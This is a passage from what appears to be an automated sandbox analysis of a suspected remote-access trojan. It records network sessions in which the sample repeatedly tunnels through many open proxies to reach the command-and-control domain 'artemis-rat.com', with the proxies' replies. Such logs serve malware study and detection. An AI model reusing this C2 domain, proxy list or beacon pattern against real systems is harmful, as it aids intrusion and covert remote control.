                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.475323915 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            688192.168.2.552007162.241.50.179359483876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.326009035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.826688051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.514724016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.806447029 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.238996983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:47.681890011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            689192.168.2.55199238.162.31.23831283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.329806089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.746795893 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            690192.168.2.551872176.123.56.5836293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.330252886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            691192.168.2.552081104.25.42.178803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.330631971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.485146999 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            692192.168.2.552054107.181.168.14541453876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.331098080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            693192.168.2.55136166.228.35.209174643876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.331360102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:43.389456987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:46.405996084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.499049902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            694192.168.2.55206247.251.34.17010803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.332837105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.795439959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.405364037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.498956919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            695192.168.2.551902125.122.26.24210803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.334690094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            696192.168.2.55190543.131.245.216156733876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.336455107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            697192.168.2.552095185.162.230.178803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.338177919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.492515087 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            698192.168.2.55188291.211.177.3736293876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.341433048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            699192.168.2.552106185.162.231.226803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.341458082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.498245001 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            700192.168.2.55189214.103.24.14880003876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.344468117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.908844948 CET59INHTTP/1.1 200 Connection Established
                                                                                                                                                                                                                                                            Proxy-agent: nginx


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            701192.168.2.55186672.49.49.11310343876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.353336096 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            702192.168.2.551875103.83.232.122803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.353771925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            703192.168.2.552124172.67.3.98803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.358581066 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.513633013 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            704192.168.2.55191069.230.240.163326503876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.359697104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.701833010 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.052822113 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy54-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                                                                                                                                                                            Data Raw:
                                                                                                                                                                                                                                                            Data Ascii:
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.079454899 CET628INHTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Server: ADM/2.1.1Connection: closeContent-Length: 509<html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>zhy50-HG100-2</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://211.93.21.5:9080/error.html"; }</script> </head> <body> <iframe id="mainFrame" src="" frameborder="0" width="100%" height="100%"></iframe> </body></html
                                                                                                                                                                                                                                                            Data Raw:
                                                                                                                                                                                                                                                            Data Ascii:


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            705192.168.2.55060888.79.243.10331283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.364243984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.681952953 CET1254INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: squid/3.5.28
                                                                                                                                                                                                                                                            Mime-Version: 1.0
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:40 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html;charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 952
                                                                                                                                                                                                                                                            X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                                                                                                                                                                            Content-Language: en
                                                                                                                                                                                                                                                            X-Cache: MISS from ah_test
                                                                                                                                                                                                                                                            Via: 1.1 ah_test (squid/3.5.28)
                                                                                                                                                                                                                                                            Connection: close
